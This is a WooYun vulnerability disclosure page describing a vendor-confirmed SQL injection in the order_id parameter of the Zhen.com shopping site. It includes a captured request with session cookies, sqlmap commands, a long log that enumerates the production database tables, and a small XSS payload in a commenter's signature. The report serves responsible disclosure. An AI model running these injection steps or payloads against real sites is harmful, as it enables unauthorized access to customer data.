当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118300

漏洞标题:珍品网高危SQL注射漏洞(可能危及一百多万用户信息)

相关厂商:珍品网

漏洞作者: DloveJ

提交时间:2015-06-05 10:27

修复时间:2015-07-20 10:34

公开时间:2015-07-20 10:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-05: 细节已通知厂商并且等待厂商处理中
2015-06-05: 厂商已经确认,细节仅向厂商公开
2015-06-15: 细节向核心白帽子及相关领域专家公开
2015-06-25: 细节向普通白帽子公开
2015-07-05: 细节向实习白帽子公开
2015-07-20: 细节向公众公开

简要描述:

土豪才能在哪里购物。珍品网;不解释。

详细说明:

危害相当大,这数据量。。
首先我们正常出册一个用户!shopping!

11.jpg


看到订单详情,点进去!

22.jpg


好的,就是这里。刷新一下,抓包!

GET /?c=order&a=see&order_id=140089 HTTP/1.1
Host: my.zhen.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=1188675584; pgv_si=s1319450624; _gat=1; auth=2ba9OqJZ%2BAfL44hUExMxdNoUHIczhV%2BLGn%2FNbf5urpK1N8t36bVLiH%2BAIlS8AH01yQloZn6chqQLilAKlYqBZbjly77T8BFsYKU; token=ec280229-87a7-415a-91e0-d7b1d0cb0197; PHPSESSID=9778cb88df1a34adb0d919f8eb931803; profile_416618=416618; _ga=GA1.2.426808257.1433499462; __utmt=1; __utma=229912279.426808257.1433499462.1433502379.1433502379.1; __utmb=229912279.3.10.1433502379; __utmc=229912279; __utmz=229912279.1433502379.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OZ_1U_1590=vid=v57177485be963.0&ctime=1433502467&ltime=1433502380; OZ_1Y_1590=erefer=-&eurl=http%3A//www.zhen.com/&etime=1433499463&ctime=1433502467&ltime=1433502380&compid=1590; NTKF_T2D_CLIENTID=guest943D6947-EDBC-40E2-AB3C-C31E6355DC28; nTalk_CACHE_DATA={uid:kf_9999_ISME9754_guest943D6947-EDBC-40,tid:1433499472227849}


-r 1.txt


1.jpg


-r 1.txt --privileges


2.jpg


-r 1.txt --current


3.jpg


currentdb里面的表


[19:29:14] [INFO] fetching tables for database: 'shop_zp'
[19:29:14] [INFO] fetching number of tables for database 'shop_zp'
[19:29:14] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[19:29:14] [INFO] retrieved: 386
[19:29:18] [INFO] retrieved: app
[19:29:54] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
_iospush
[19:30:39] [INFO] retrieved: bernardellistores
[19:32:11] [INFO] retrieved: biao_product_tmp
[19:33:39] [INFO] retrieved: comments_robot_bag
[19:35:23] [INFO] retrieved: comments_robot_cosmetics
[19:36:31] [INFO] retrieved: comments_robot_scarf_nv
[19:37:40] [INFO] retrieved: comments_robot_shoe
[19:38:20] [INFO] retrieved: coo8_brand
[19:39:13] [INFO] retrieved: coo8_result
[19:39:52] [INFO] retrieved: goods_id_20131231
[19:41:34] [INFO] retrieved: gt _special_qing_list
[19:43:38] [INFO] retrieved: gt_360_event_list
[19:45:08] [INFO] retrieved: gt_ac
[19:45:45] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
t
[19:46:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
ivity
[19:46:44] [INFO] retrieved: gt_activity_cart
[19:47:29] [INFO] retrieved: gt_activity_condition
[19:48:33] [INFO] retrieved: gt_activity_gift
[19:49:20] [INFO] retrieved: gt_activity_iphone6_2014
[19:50:54] [INFO] retrieved: gt_act
[19:51:26] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
ivity_
[19:51:51] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
l
[19:52:16] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
o
[19:52:41] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
g
[19:52:46] [INFO] retrieved: g
[19:53:02] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[19:53:24] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
t_activity_news
[19:53:59] [INFO] retrieved: gt_activity_range
[19:54:48] [INFO] retrieved: gt_activity_range_20150410
[19:56:09] [INFO] retrieved: gt_activity_rule
[19:56:45] [INFO] retrieved: gt_activity_type
[19:57:23] [INFO] retrieved: gt_add_images
[19:58:39] [INFO] retrieved: gt_ads_chanet
[19:59:41] [INFO] retrieved: gt_ads_
[20:00:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
duomai
[20:00:38] [INFO] retrieved: gt_ads_eshop
[20:01:22] [INFO] retrieved: gt_ads_linktech
[20:02:24] [INFO] retrieved: gt_ads_sina
[20:03:01] [INFO] retrieved: gt_ads_sohu
[20:03:30] [INFO] retrieved: gt_ads_woaisheng
[20:04:44] [INFO] retrieved: gt_ads_yoyi
[20:05:17] [INFO] retrieved: gt_amazon_orders
[20:06:29] [INFO] retrieved: gt_amazon_products
[20:07:39] [INFO] retrieved: gt_amazon_submit_log
[20:08:50] [INFO] retrieved: gt_ana_collation
[20:10:18] [INFO] retrieved: gt_ana_origin_info
[20:11:41] [INFO] retrieved: gt_analyse_brand_sales
[20:13:28] [INFO] retrieved: gt_analyse_category_sales
[20:15:13] [INFO] retrieved: gt_analyse_color_sal
[20:16:26] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
es
[20:16:35] [INFO] retrieved: gt_analyse_member_order_sales
[20:18:35] [INFO] retrieved: gt_analyse_member_quantity_sales
[20:20:22] [INFO] retrieved: gt_analyse_price_sales
[20:21:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[20:21:53] [INFO] retrieved: gt_analyse_product_sales
[20:23:15] [INFO] retrieved: gt_analyse_refund_order
[20:24:39] [INFO] retrieved: gt_analyse_region_order
[20:25:53] [INFO] retrieved: gt_analyse_sale_order
[20:27:13] [INFO] retrieved: gt_analyse_spec_value_sales
[20:28:54] [INFO] retrieved: gt_analyse_stock_change
[20:30:10] [INFO] retrieved: gt_app_publicity
[20:31:27] [INFO] retrieved: gt_app_send_user
[20:32:31] [INFO] retrieved: gt_app_spec_group
[20:33:31] [INFO] retrieved: gt_app_spec_price
[20:34:19] [INFO] retrieved: gt_attribute
[20:35:13] [INFO] retrieved: gt_attribute_values
[20:36:09] [INFO] retrieved: gt_bank_actively
[20:37:38] [INFO] retrieved: gt_batch_edit_product
[20:39:19] [INFO] retrieved: gt_batch_edit_product_spec
[20:40:12] [INFO] retrieved: gt_batch_edit_task
[20:40:55] [INFO] retrieved: gt_book
[20:41:28] [INFO] retrieved: gt_book_evaluate
[20:42:26] [INFO] retrieved: gt_book_recom_goods
[20:43:42] [INFO] retrieved: gt_book_recom_group
[20:44:30] [INFO] retrieved: gt_book_recom_group_goods
[20:45:19] [INFO] retrieved: gt_book_watch
[20:46:01] [INFO] retrieved: gt_bran
[20:46:43] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
d_seo
[20:47:15] [INFO] retrieved: gt_cancel_reason
[20:48:34] [INFO] retrieved: gt_card
[20:48:57] [INFO] retrieved: gt_card_batch
[20:49:38] [INFO] retrieved: gt_card_batch_150407
[20:50:33] [INFO] retrieved: gt_card_batch_log
[20:51:12] [INFO] retrieved: gt_card_range
[20:52:01] [INFO] retrieved: gt_cart
[20:52:16] [INFO] retrieved: gt_cart_new
[20:52:47] [INFO] retrieved: gt_cate_attr_values
[20:54:31] [INFO] retrieved: gt_category_attribute
[20:56:02] [INFO] retrieved: gt_category_card
[20:56:36] [INFO] retrieved: gt_category_map
[20:57:06] [INFO] retrieved: gt_category_seo
[20:57:34] [INFO] retrieved: gt_category_size_img
[20:58:28] [INFO] retrieved: gt_change_stock
[20:59:51] [INFO] retrieved: gt_collect_arrive_attention
[21:01:54] [INFO] retrieved: gt_combination
[21:02:57] [INFO] retrieved: gt_combination_group
[21:03:44] [INFO] retrieved: gt_combination_log
[21:04:16] [INFO] retrieved: gt_combination_products
[21:05:19] [INFO] retrieved: gt_company_members
[21:06:43] [INFO] retrieved: gt_consumption_member
[21:08:28] [INFO] retrieved: gt_coo8_result
[21:09:29] [INFO] retrieved: gt_coupon_blank_receive
[21:11:34] [INFO] retrieved: gt_coupon_card_channel
[21:12:49] [INFO] retrieved: gt_coupon_car


还在继续。我先提交了

漏洞证明:

危害我就不说了,给个高rank就可以了

修复方案:

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-05 10:32

厂商回复:

感谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-05 12:49 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    厂商好棒!有木有礼物呢?我就只是问问!@珍品网